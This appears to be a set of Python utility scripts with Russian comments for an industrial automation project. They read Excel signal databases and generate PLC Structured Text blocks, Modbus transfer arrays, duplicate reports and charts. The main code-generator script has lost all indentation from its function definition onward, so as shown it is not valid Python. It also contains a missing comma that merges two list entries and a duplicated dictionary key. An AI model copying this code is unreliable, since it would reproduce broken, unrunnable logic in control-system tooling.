    "Контактный аппарат": [
        "Man_Mode_2",
        "Cmd_Strt_Gchu_2",
        "Auto_Mode_2",
        "Man_Mode_1",
        "Cmd_Strt_Gchu_1",
        "Auto_Mode_1",
        "Cmd_Stp_Rchu_2",
        "Cmd_Stp_Rchu_1",
        "Cmd_Strt_Rchu_2",
        "Cmd_Strt_Rchu_1",
        "Run_2",
        "Run_1",
        "On_Run_1",
        "Power_En",
        "On_Stp_1",
        "Cmd_Stp_Gchu_1",
        "Cmd_Stp_Gchu_2",
        "Power_En_1",
        "Power_En_2",
        "Main_Mode_1",
        "Main_Mode_2"],
    "мешалка": [
        "Run",
        "Local",
        "Remoute",
        "Cmd_On"],
    "Насос": [
        "Cmd_Strt_Rchu",
        "Cmd_Stp_Rchu",
        "Cmd_Strt_Gchu",
        "Cmd_Stp_Gchu",
        "Main_Mode",
        "Cmd_Stp_Local",
        "Auto_Mode",
        "Local",
        "Remoute",
        "Backup_Mode",
        "Run",
        "Power_En",
        "Auto_Main_On",
        "Membrana",
        "Stp",
        "Auto_Back_On",
        "Cmd_Strt_Local",
        "Man_Mode"],
    # The original contained this entry twice with identical contents; the
    # duplicate dict key was dropped (the later copy only overwrote this one
    # with the same value, so the resulting dict is unchanged).
    "Насос ??": [
        "Cmd_Strt_Rchu",
        "Cmd_Stp_Rchu",
        "Cmd_Strt_Gchu",
        "Cmd_Stp_Gchu",
        "Main_Mode",
        "Cmd_Stp_Local",
        "Auto_Mode",
        "Local",
        "Remoute",
        "Backup_Mode",
        "Run",
        "Power_En",
        "Auto_Main_On",
        "Membrana",
        "Stp",
        "Auto_Back_On",
        "Cmd_Strt_Local",
        "Man_Mode"],
    "РЕЗЕРВ": [],
    "Шибер": []
}
# Main procedure: map each object in the master base to the mnemoscheme
# (*.txt) listing that references it, assign transfer-array indices, and
# write the result to output.xlsx.
starttime = datetime.now()  # NOTE(review): never read afterwards
inputfile = r'C:\Users\rangin\Desktop\MS_objects\WORK_master_basa.xlsm'
sheetname = 'Лист1'
# Trailing space lets the raw string end after a backslash; sliced off below.
folder = r'C:\Users\rangin\Desktop\MS_objects\ '
files = glob.glob(os.path.join(folder[:-1], '*.txt'))
# Map: object name -> basename of the mnemoscheme file that lists it.
ilist = {}
for file in files:
    f = open(file, 'r')
    for line in f:
        ilist.update({line.rstrip(): file.split('\\')[-1]})
    f.close()
df = importdf(inputfile, sheetname)
# Fill in the column with element numbers in the transfer array.
df['Номер элемента в массиве пересылки'] = ''
# NOTE(review): sort_values is not in-place and its result is discarded here;
# confirm whether sorting by this column was actually intended.
df.sort_values(by=['Наименов_0'])
df1 = df.loc[df['Не использовать сигнал'] != 1]
# One zeroed per-parent-KIS counter dictionary, copied per KIS below.
array_indexes = {
    "КИС320.1": 0,
    "КИС336.1": 0,
    "КИС336.2": 0,
    "КИС336.3": 0,
    "КИС420.1": 0,
    "КИС420.2": 0,
    "КИС420.3": 0,
    "КИС420.4": 0,
    "КИС420.5": 0,
    "КИС420.6": 0,
    "КИС420.7": 0}
arr_index_KIS = [0] * len(KISes)
for i in range(0, len(KISes)):
    arr_index_KIS[i] = array_indexes.copy()
# Assign consecutive transfer-array indices per (KIS, parent-KIS) pair.
# NOTE(review): df1 is a .loc slice of df — writing through df1.at may raise
# SettingWithCopyWarning; verify the updated frame is the one consumed later.
for index, row in df1.iterrows():
    if row['Номер КИС'] != row['Номер КИС к родителю'] and "КИС" in str(row['Номер КИС к родителю']):
        df1.at[index, 'Номер элемента в массиве пересылки'] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] # =array_indexes[row['Номер КИС к родителю']]
        arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] + 1
naimen_0 = df1["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # drop NaN values
total = len(naimen_0) - 1  # NOTE(review): unused below
d = {'Объект': [], 'КИС': [], 'Привязка к мнемосхеме': []}
odf = pd.DataFrame(data=d)
# NOTE(review): DataFrame.append was removed in pandas 2.0; as written this
# script requires pandas < 2.
for name in naimen_0:
    try:
        MS = [ilist[name].replace('.RDB.txt', '')]
    except KeyError:
        MS = 'Не используется на мнемосхеме'
    odf = odf.append({'Объект': [name], 'КИС': [df1.loc[df1["Наименов_0"] == name]["Номер КИС к родителю"].values[0]], 'Привязка к мнемосхеме': MS}, ignore_index=True)
odf.to_excel(folder[:-1] + "output.xlsx")
<file_sep># Гистограмма количества объектов по типам объектов
import matplotlib.pyplot as plt
import pandas as pd

# Horizontal bar chart: number of unique objects per object type in the base.
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Копия WORK_10998_from 19дек 13-40+Сводная.xlsx'
df = pd.read_excel(inputfile, sheet_name='Лист1')
# BUG FIX: '?' must be stripped as a literal character.  The old call passed
# r'?' under pandas' (version-dependent) regex default, where a bare '?' is
# an invalid pattern; regex=False makes the intent explicit and portable.
# (The trailing .copy() on an assignment was a no-op and was removed, as was
# the unused `ind = y.max()`.)
df["Тип объекта"] = df["Тип объекта"].str.replace('?', '', regex=False)
df["Тип объекта"] = df["Тип объекта"].str.strip()
# Count only rows flagged as unique objects.
y = df.loc[df["Уникальное значение"] == 1]["Тип объекта"].value_counts()
fig, ax = plt.subplots(figsize=(14, 10))
# Label each bar with its count, just to the right of the bar end.
for i, v in enumerate(y):
    ax.text(v + 3, i + 0.15, str(v), color='blue', fontweight='bold')
ax.barh(y.keys(), y.values, left=0, height=0.5, color="blue")
ax.set_yticklabels(y.keys(), minor=False)
plt.title('Количество объектов в базе')
plt.xlabel('Количество, шт.')
plt.ylabel('Тип объекта')
plt.show()
<file_sep>import xml.etree.ElementTree as ET
filename = r'C:\Users\1\Desktop\test_export_mast.xpg'
tree = ET.parse(filename)
root = tree.getroot()
# Prepend a marker line to the ST source of one specific program and save the
# patched project as output.xpg.
for program_node in root.findall('program'):
    ident = program_node.find('identProgram')
    program_name = ident.get('name')
    if program_name == "DI_Filtration_A026_A029":
        source_node = program_node.find('STSource')
        source_node.text = "Hello WORLD \n" + source_node.text
tree.write('output.xpg', encoding='UTF-8')
<file_sep># Поиск дубликатов в разных КИС по названию объекта
import os

# Find object names that appear in the "analyzed" listings of more than one
# KIS.  The trailing space lets the raw string end after a backslash; it is
# removed with [:-1] wherever the path is used.
path = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Объекты\Электронагреватель\el_nagr_TXT\ '
files = os.listdir(path[:-1])
analyzed = []
for x in files:
    if "analyzed.txt" in x:
        analyzed.append(x)
# Compare every pair of listings exactly once.
# BUG FIX: the inner loop previously ran to len(analyzed)-1, which silently
# excluded the last file from every comparison.
for i in range(0, len(analyzed) - 1):
    for j in range(i + 1, len(analyzed)):
        # BUG FIX: the old code tested `line in file_object`, which consumes
        # the file iterator, so later lines could never be matched.  Load the
        # second file into a set and test membership against that.
        with open(path[:-1] + analyzed[j]) as f2:
            lines_j = set(f2)
        with open(path[:-1] + analyzed[i]) as f1:
            for f in f1:
                if f in lines_j:
                    print(f + ' встречается в ' + analyzed[i][:9] + ' и в ' + analyzed[j][:9])
print(analyzed)
<file_sep>import pandas as pd
# For every object name, flag names whose block inputs ("Вход блока") contain
# duplicated values — these usually indicate conflicting rows in the base.
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Старое\Бэкап от 29062020 Ревизия + WORK_10998_from 19дек 13-40+Сводная.xlsx'
df = pd.read_excel(inputfile, sheet_name='Лист1')
naimen_0 = df["Наименов_0"].unique().tolist()
# Drop NaN (NaN != NaN, so the identity comparison filters it out).
naimen_0 = {x for x in naimen_0 if x == x}
questionable_names = []
for name in naimen_0:
    types = df.loc[df['Наименов_0'] == name]["Вход блока"]
    unique_types = types.unique()
    duplicated_types = types.duplicated()
    # BUG FIX: the old check was `"True" in str(duplicated_types)`, which
    # inspects the (possibly truncated) string repr of the Series and can
    # miss rows hidden behind the "..." ellipsis; use Series.any() instead.
    if duplicated_types.any():
        print(str(name) + str(unique_types))
        questionable_names.append(name)
print('end')
<file_sep>import pandas as pd
import os
from datetime import datetime
def importdf(filename, sheet):
    """Load one worksheet of an Excel workbook into a DataFrame."""
    return pd.read_excel(filename, sheet_name=sheet)
def logerror(text):
    """Append one line to errors.txt in the script's working directory.

    ``currentdirname`` is a module-level global defined elsewhere in this
    script.
    """
    # `with` guarantees the handle is closed even if the write fails; the
    # original opened/closed manually and could leak the handle on error.
    with open(currentdirname + '\\errors.txt', 'a+') as ff:
        ff.write(text + '\n')
def foo(data, block_inputs):
parent_KIS = data['Номер КИС к родителю'].values[0]
if 'КИС' not in str(parent_KIS):
parent_KIS = data['Номер КИС'].values[0]
obj_type = data['Тип объекта'].values[0]
obj_name = data['Наименов_0'].values[0]
# Print для того, чтобы видеть, что не виснет
print(f'{obj_name} - {nomer} из {total}')
print(f'{currentdirname} q {parent_KIS} q {obj_type.replace("?", "q")} q {parent_KIS} q ')
#
try:
f = open(currentdirname + '\\' + parent_KIS + '\\' + obj_type.replace("?", "q") + " " + parent_KIS + '\\' + obj_type.replace("?", "q") + ' ' + parent_KIS + '.txt', 'a+')
except FileNotFoundError:
os.mkdir(currentdirname + '\\' + parent_KIS + '\\' + obj_type.replace("?", "q") + " " + parent_KIS)
f = open(currentdirname + '\\' + parent_KIS + '\\' + obj_type.replace("?", "q") + " " + parent_KIS + '\\' + obj_type.replace("?", "q") + ' ' + parent_KIS + '.txt', 'a+')
# Если файл пустой, сделать header
f.seek(0, os.SEEK_END) # go to end of file
if f.tell(): # if current position is truish (i.e != 0)
f.seek(0) # rewind the file for later use
else:
f.write(f'(*----------- {parent_KIS} обработка объекта {obj_type} {datetime.now().strftime("%Y_%m_%d %H:%M:%S")} --------------------*)\n\n')
no_AI = 0
ai_module = 0
ai_channel = 0
ai_EU = 0
ai_scale_min = 0
ai_scale_max = 0
ai_rakurs_index = 0
ai_sign_name = 0
ai_klemma = 0
if obj_type == "Сигн AI":
try:
ai_module = data.loc[data["Вход блока"] == "In"]["Номер модуля"].values[0]
ai_channel = data.loc[data["Вход блока"] == "In"]["Канал модуля"].values[0]
ai_EU = data.loc[data["Вход блока"] == "In"]["Единицы измер параметра"].values[0]
ai_scale_min = data.loc[data["Вход блока"] == "In"]["нижн предел парам"].values[0]
ai_scale_max = data.loc[data["Вход блока"] == "In"]["верхний предел парам"].values[0]
ai_rakurs_index = data.loc[data["Вход блока"] == "In"]["Ракурс индекс"].values[0]
ai_sign_name = data.loc[data["Вход блока"] == "In"]["Наименование сигн"].values[0]
ai_klemma = data.loc[data["Вход блока"] == "In"]["Номер клемника и клеммы"].values[0]
# Добавить запись по объекту
## Заголовок
f.write(f"(*____{obj_name}_____ {ai_module} CH_[{ai_channel}] eдиницы измерения параметра {ai_EU} объект {object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)]}*)\n")
no_AI = 0
except IndexError:
logerror(f'Sign AI {obj_name} не содержит AI сигнала')
f.write(f"(*____{obj_name}_____ БЕЗ AI ] объект {object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)]}*)\n")
no_AI = 1
for inp in block_inputs:
if inp != "In":
try:
module = data.loc[data["Вход блока"] == inp]["Номер модуля"].values[0]
channel = data.loc[data["Вход блока"] == inp]["Канал модуля"].values[0]
sign_KIS = data.loc[data["Вход блока"] == inp]["Номер КИС"].values[0]
rakurs_index = data.loc[data["Вход блока"] == inp]["Ракурс индекс"].values[0]
sign_name = data.loc[data["Вход блока"] == inp]["Наименование сигн"].values[0]
klemma = data.loc[data["Вход блока"] == inp]["Номер клемника и клеммы"].values[0]
if channel == 'не опред' or module == 'A0СУ':
logerror(f'не определен канал или модуль для {rakurs_index}')
continue
if parent_KIS == sign_KIS:
f.write(f'{obj_name}_DI.{inp}:={module}_DI{"%.02d" % channel}.STS; (* {rakurs_index}, {sign_name} *)(*{klemma}*)\n')
else:
try:
array_element_in = int(
data.loc[data["Вход блока"] == inp]["Номер элемента в массиве пересылки"].values[0])
except ValueError:
f.write(f'{obj_name}_DI.{inp}:=ZeroByte; (*ВНИМАНИЕ! ЗДЕСЬ БЫЛА ОШИБКА В БАЗЕ, УСТРАНИТЬ И ОБРАТИТЬ ВНИМАНИЕ*)\n')
logerror(f'не определен номер элемента в массиве пересылки для {rakurs_index}')
continue
# Выставление соответствия номеров массивов (посылка Modbus TCP содержит не более 250 переменных BYTE)
if array_element_in > 249:
data_array_number = 2
array_element_for = array_element_in - 250
else:
data_array_number = 1
array_element_for = array_element_in
f.write(f'{obj_name}_DI.{inp}:={sign_KIS.replace("КИС", "KIS").replace(".", "_")}.Inputs.{sign_KIS.replace("КИС", "KIS").replace(".", "_")}_IN[{array_element_in}]; (*FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS;*)(*{klemma}*)\n')
with open(currentdirname + '\\' + sign_KIS + '\\!' + sign_KIS + 'Массив пересылок.txt', 'a+') as outfile:
outfile.seek(0, os.SEEK_END) # go to end of file
if outfile.tell(): # if current position is truish (i.e != 0)
outfile.seek(0) # rewind the file for later use
else:
outfile.write(f'(*----------- массив пересылки из {sign_KIS} {datetime.now().strftime("%Y_%m_%d %H:%M:%S")} --------------------*)\n\n')
outfile.write(f'FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS;(*{obj_name} {inp} из {sign_KIS} в {parent_KIS} {module} {channel} *)\n')
except (KeyError, IndexError) as e:
pass
f.write(f'{obj_name}_block (UDT :={obj_name},\n')
if no_AI:
f.write(f' In:=Empty_AI, (* Без АИ*)\n')
f.write(f' Scale_min := 0.0,\n')
f.write(f' Scale_max := 0.0,\n')
else:
f.write(f' In:={ai_module}.ANA_CH_IN[{ai_channel}], (* {ai_rakurs_index}, {ai_sign_name} *)(*{ai_klemma}*)\n')
f.write(f' Scale_min := {ai_scale_min},\n')
f.write(f' Scale_max := {ai_scale_max},\n')
try:
f.write(f' Address := {ai_module[len(ai_module)-2::]}.{ai_channel},\n')
except TypeError:
f.write(f' Address := 0.0,\n')
f.write(f' DI := {obj_name}_DI);\n\n')
else:
# Добавить запись по объекту
## Заголовок
f.write(f"(*____{obj_name}_____ объект {object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)]}*)\n")
# Записываем объект
f.write(f'{obj_name}_block (UDT :={obj_name},\n')
if "In" in block_inputs:
ai_module = data.loc[data["Вход блока"] == "In"]["Номер модуля"].values[0]
ai_channel = data.loc[data["Вход блока"] == "In"]["Канал модуля"].values[0]
ai_rakurs_index = data.loc[data["Вход блока"] == "In"]["Ракурс индекс"].values[0]
ai_sign_name = data.loc[data["Вход блока"] == "In"]["Наименование сигн"].values[0]
f.write(f' {"In"}:={ai_module}.ANA_CH_IN[{ai_channel}], (* {ai_rakurs_index}, {ai_sign_name} *)\n')
scale_min = data.loc[data["Вход блока"] == "In"]["нижн предел парам"].values[0].replace(',', '.')
scale_max = data.loc[data["Вход блока"] == "In"]["верхний предел парам"].values[0].replace(',', '.')
try:
f.write(f' Address := {ai_module[len(ai_module)-2::]}.{ai_channel},\n')
except TypeError:
f.write(f' Address := 0.0,\n')
f.write(f' Scale_min := {scale_min},\n')
f.write(f' Scale_max := {scale_max});\n\n')
else:
for inp in block_inputs:
try:
sign_KIS = data.loc[data["Вход блока"] == inp]["Номер КИС"].values[0]
module = data.loc[data["Вход блока"] == inp]["Номер модуля"].values[0]
rakurs_index = data.loc[data["Вход блока"] == inp]["Ракурс индекс"].values[0]
channel = data.loc[data["Вход блока"] == inp]["Канал модуля"].values[0]
sign_name = data.loc[data["Вход блока"] == inp]["Наименование сигн"].values[0]
if channel == 'не опред' or module == 'A0СУ':
logerror(f'не определен канал или модуль для {rakurs_index}')
continue
if parent_KIS == sign_KIS:
if inp == "In": # AI
f.write(f' {inp}:={module}.ANA_CH_IN[{channel}], (* {rakurs_index}, {sign_name} *)\n')
scale_min = data.loc[data["Вход блока"] == inp]["нижн предел парам"].values[0].replace(',', '.')
scale_max = data.loc[data["Вход блока"] == inp]["верхний предел парам"].values[0].replace(',', '.')
f.write(f' Scale_min := {scale_min},\n')
f.write(f' Scale_max := {scale_max});\n\n')
continue
else:
f.write(f' {inp}:={module}_DI{"%.02d" % channel}.STS, (* {rakurs_index}, {sign_name} *)\n')
else:
try:
array_element_in = int(data.loc[data["Вход блока"] == inp]["Номер элемента в массиве пересылки"].values[0])
except ValueError:
f.write(f' {inp}:=ZeroByte, (*ВНИМАНИЕ! ЗДЕСЬ БЫЛА ОШИБКА В БАЗЕ, УСТРАНИТЬ И ОБРАТИТЬ ВНИМАНИЕ*)\n')
logerror(f'не определен номер элемента в массиве пересылки для {rakurs_index}')
continue
# Выставление соответствия номеров массивов (посылка Modbus TCP содержит не более 250 переменных BYTE)
if array_element_in > 249:
data_array_number = 2
array_element_for = array_element_in - 250
else:
data_array_number = 1
array_element_for = array_element_in
f.write(f' {inp}:={sign_KIS.replace("КИС", "KIS").replace(".", "_")}.Inputs.{sign_KIS.replace("КИС", "KIS").replace(".", "_")}_IN[{array_element_in}], (*FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS; {rakurs_index}, {sign_name}*)\n')
with open(currentdirname + '\\' + sign_KIS + '\\!' + sign_KIS + 'Массив пересылок.txt', 'a+') as outfile:
outfile.seek(0, os.SEEK_END) # go to end of file
if outfile.tell(): # if current position is truish (i.e != 0)
outfile.seek(0) # rewind the file for later use
else:
outfile.write(f'(*----------- массив пересылки из {sign_KIS} {datetime.now().strftime("%Y_%m_%d %H:%M:%S")} --------------------*)\n\n')
outfile.write( f'FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS;(*{obj_name} {inp} из {sign_KIS} в {parent_KIS} {module} {channel} *)\n')
except (KeyError, IndexError) as e:
f.write(f' {inp}:=ZeroByte,\n')
f.write(' TimeCtrl := t#5m);\n\n')
## Итерируем счетчик
object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)] = object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)] + 1
f.close()
if __name__ == '__main__':
KISes = [
"КИС320.1",
"КИС336.1",
"КИС336.2",
"КИС336.3",
"КИС420.1",
"КИС420.2",
"КИС420.3",
"КИС420.4",
"КИС420.5",
"КИС420.6",
"КИС420.7"]
object_types = [
"Клапан",
"Электронагреватель",
"AI",
"AI_Sign",
"Электрофорезный фильтр",
"Фильтр рулонный",
"КИД",
"МЕО1",
"Сигнализатор",
"Вентилятор",
"Избиратель",
"Контактный аппарат",
"Мешалка",
"Насос",
"Шибер"]
foo_switcher = {
"Клапан": [
"OP",
"CL",
"Local",
"Remoute",
"Power_En",
"CMD_OP_GCHU",
"CMD_CL_GCHU",
"CMD_STP_GCHU",
"CMD_OP_RCHU",
"CMD_CL_RCHU",
"CMD_STP_RCHU",
"Auto_mode",
"Man_mode"],
'el_nagr': [
"Run",
"Cmd_Strt_Local",
"Cmd_Strt_Rchu"],
"AI": ["In"],
"AI_complicate": [
"Limit4_H",
"Limit9_L_PS2",
"Limit10_LL_PS2_Dis",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit4_H_Dis",
"Limit8_LL",
"Limit10_LL_PS2",
"Limit7_L",
"Limit9_L_PS2_Dis",
"Limit1_HH_PS2",
"Limit1_HH_PS2_Dis",
"Limit3_HH",
"Limit3_HH_Dis",
"Limit3_HH_Cmd",
"Limit8_LL_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit4_H_Cmd",
"Limit1_HH_PS2_Cmd",
"Limit7_L_Cmd",
"Limit9_L_PS2_Cmd",
"Power_En",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit2_HH_PS2_Dis",
"In"],
"Сигн AI": [
"Limit3_HH_Cmd",
"Limit4_H_Cmd",
"Limit7_L",
"Limit4_H",
"Limit4_H_Dis",
"Limit3_HH_Dis",
"Limit3_HH",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit8_LL",
"Limit7_L_Cmd",
"Limit8_LL_Cmd",
"Limit9_L_PS2_Cmd",
"Limit6_Ln",
"Limit6_Ln_Dis",
"Limit6_Ln_Cmd",
"Limit5_Hn",
"Power_En",
"Limit2_HH_PS2_Dis",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit5_Hn_Cmd",
"Limit9_L_PS2",
"Limit10_LL_PS2",
"Limit9_L_PS2_Dis",
"Limit10_LL_PS2_Dis",
"In"],
"Сигн AI ??": [
"Limit3_HH_Cmd",
"Limit4_H_Cmd",
"Limit7_L",
"Limit4_H",
"Limit4_H_Dis",
"Limit3_HH_Dis",
"Limit3_HH",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit8_LL",
"Limit7_L_Cmd",
"Limit8_LL_Cmd",
"Limit9_L_PS2_Cmd",
"Limit6_Ln",
"Limit6_Ln_Dis",
"Limit6_Ln_Cmd",
"Limit5_Hn",
"Power_En",
"Limit2_HH_PS2_Dis",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit5_Hn_Cmd",
"Limit9_L_PS2",
"Limit10_LL_PS2",
"Limit9_L_PS2_Dis",
"Limit10_LL_PS2_Dis"
"In"],
"Elektroforez": [
"Limit7_L",
"Limit8_LL",
"On_Perepolus",
"On_Rabota"],
"flt_rulon": [
"Run",
"Remoute",
"Local",
"Cmd_Strt_Gchu",
"Cmd_Strt_Local"],
'kid': [
"Cmd_Cl_Gchu",
"Cmd_Op_Gchu",
"Power_En_Rchu",
"CL",
"OP",
"Remoute",
"Power_En_Cho"],
'meo_1': [
"na_back",
"na_forw"],
'NO': [],
"Signalizator": ["Sign"],
"вентилятор": [
"Cmd_Strt_Rchu",
"Man_Mode",
"Run",
"Local",
"Remoute",
"Pozar_Run",
"Avaria_Stp",
"Stp",
"Auto_Mode",
"Auto_Main_On",
"No_Power_En",
"Cmd_Strt_Local",
"Klapan_Cl",
"Avaria_Off",
"Klapan_Op",
"Auto_Back_On",
"Remoute_On"],
"вентилятор ??": [
"Cmd_Strt_Rchu",
"Man_Mode",
"Run",
"Local",
"Remoute",
"Pozar_Run",
"Avaria_Stp",
"Stp",
"Auto_Mode",
"Auto_Main_On",
"No_Power_En",
"Cmd_Strt_Local",
"Klapan_Cl",
"Avaria_Off",
"Klapan_Op",
"Auto_Back_On",
"Remoute_On"],
"избиратель": [
"Manual_mode",
"Auto_Mode"],
"Контактный аппарат": [
"Man_Mode_2",
"Cmd_Strt_Gchu_2",
"Auto_Mode_2",
"Man_Mode_1",
"Cmd_Strt_Gchu_1",
"Auto_Mode_1",
"Cmd_Stp_Rchu_2",
"Cmd_Stp_Rchu_1",
"Cmd_Strt_Rchu_2",
"Cmd_Strt_Rchu_1",
"Run_2",
"Run_1",
"On_Run_1",
"Power_En",
"On_Stp_1",
"Cmd_Stp_Gchu_1",
"Cmd_Stp_Gchu_2",
"Power_En_1",
"Power_En_2",
"Main_Mode_1",
"Main_Mode_2"],
"мешалка": [
"Run",
"Local",
"Remoute",
"Cmd_On"],
"Насос": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"Насос ??": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"Насос ??": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"РЕЗЕРВ": [],
"Шибер": []
}
outputdirectory = r'C:\Users\1\Desktop\PLC code'
currentdirname = outputdirectory + '\\' + datetime.now().strftime("%Y_%m_%d %H_%M")
try:
os.makedirs(currentdirname) # Создаем общую папку для всех папок
except FileExistsError:
currentdirname = currentdirname + '(2)'
os.makedirs(currentdirname)
for KIS in KISes:
os.mkdir(currentdirname + '\\' + KIS)
object_counter = [[1] * len(foo_switcher.keys()) for _ in range(len(KISes))]
starttime = datetime.now()
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\WORK_10998_20_11_17.xlsm'
sheetname = 'Лист1'
df = importdf(inputfile, sheetname)
# Заполнить строку с номерами элементов в массиве пересылки
df['Номер элемента в массиве пересылки'] = ''
df.sort_values(by=['Наименов_0'])
df1 = df.loc[df['Не использовать сигнал'] != 1]
array_indexes = {
"КИС320.1": 0,
"КИС336.1": 0,
"КИС336.2": 0,
"КИС336.3": 0,
"КИС420.1": 0,
"КИС420.2": 0,
"КИС420.3": 0,
"КИС420.4": 0,
"КИС420.5": 0,
"КИС420.6": 0,
"КИС420.7": 0}
arr_index_KIS = [0] * len(KISes)
for i in range(0, len(KISes)):
arr_index_KIS[i] = array_indexes.copy()
for index, row in df1.iterrows():
if row['Номер КИС'] != row['Номер КИС к родителю'] and "КИС" in str(row['Номер КИС к родителю']):
df1.at[index, 'Номер элемента в массиве пересылки'] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] # =array_indexes[row['Номер КИС к родителю']]
arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] + 1
naimen_0 = df1["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # Убираем NaN
total = len(naimen_0) - 1
for nomer, name in enumerate(naimen_0):
type_inputs = foo_switcher.get(df1.loc[df1['Наименов_0'] == name]['Тип объекта'].values[0], "Fail")
if type_inputs == "Fail":
logerror(f'{name} имеет неправильный тип')
continue
if df1.loc[df1['Наименов_0'] == name]['Номер КИС'].values[0] not in KISes:
logerror(f'{name} имеет неправильный номер КИС')
continue
raw_data = df1.loc[df1['Наименов_0'] == name]
data_without_bad_signs = raw_data.loc[raw_data['Не использовать сигнал'] != '1']
if len(data_without_bad_signs.index) > 0:
foo(data_without_bad_signs, foo_switcher.get(data_without_bad_signs['Тип объекта'].values[0]))
print("Экспорт датафрейма в файл...")
df1.to_excel(currentdirname + r"\output.xlsx")
endtime = datetime.now()
minutes = divmod((endtime-starttime).seconds, 60)
print('Время выполнения программы ', minutes[0], ' минут ', minutes[1], ' секунд')
<file_sep># Гистограмма количества привязанных объектов к мнемосхемам
import glob
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Сводная по мнемосхемам.xlsx'
objfile = r'C:\Users\1\Desktop\MS_objects\ '
df = pd.read_excel(inputfile, sheet_name='Данные')
df['MS_fact'] = ''
files = glob.glob(os.path.join(objfile[:-1], '*.txt'))
for file in files:
f = open(file, 'r')
f1 = f.readlines()
for i in range(0, len(f1)):
f1[i] = f1[i].replace('\n', '')
for row in f1:
df["MS_fact"] = np.where(df['Наименов_0'] == row, df["MS_fact"] + format(os.path.basename(file))[:4], df["MS_fact"])
f.close()
z = df.loc[df["Уникальное значение"] == 1, "MS_fact"].value_counts()
data = pd.DataFrame()
for i in range(1, 45):
newrow = {"MS": 'MS'+'{:02d}'.format(i), "count": 0}
data = data.append(newrow, ignore_index=True)
for row in z.keys():
duplicated = []
for foo in [row[i:i + 4] for i in range(0, len(row), 4)]:
if foo in duplicated:
continue
else:
duplicated.append(foo)
data.loc[data["MS"] == foo, 'count'] = data.loc[data["MS"] == foo, 'count'] + z[row]
fig, ax = plt.subplots(figsize=(14, 10))
for i, v in enumerate(data['count']):
ax.text(v + 1, i, "{:.0f}".format(v), color='tomato')
ax.barh(data.MS, data["count"], left=0, height=0.5, color="tomato")
ax.set_yticklabels(data.MS, minor=False)
plt.title('Количество привязанных объектов к мнемосхемам')
plt.xlabel('Количество, шт.')
plt.ylabel('Мнемосхема')
plt.show()
<file_sep>path = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Объекты\Электронагреватель\el_nagr_TXT\ '
filenames = [["KIS_336_1", 1],
["KIS_336_2", 1],
["KIS_336_3", 1],
["KIS_320_1", 0],
["KIS_420_1", 1],
["KIS_420_2", 1],
["KIS_420_3", 1],
["KIS_420_4", 1],
["KIS_420_5", 1],
["KIS_420_6", 1],
["KIS_420_7", 1]]
# filename = path + r'KIS_420_7_Ventilator'
for filename in filenames:
if filename[1] == 1:
outputfile = path[:-1] + filename[0] + '_analyzed.txt'
f = open(path[:-1] + filename[0] + '_Nasos' + '.txt', "r")
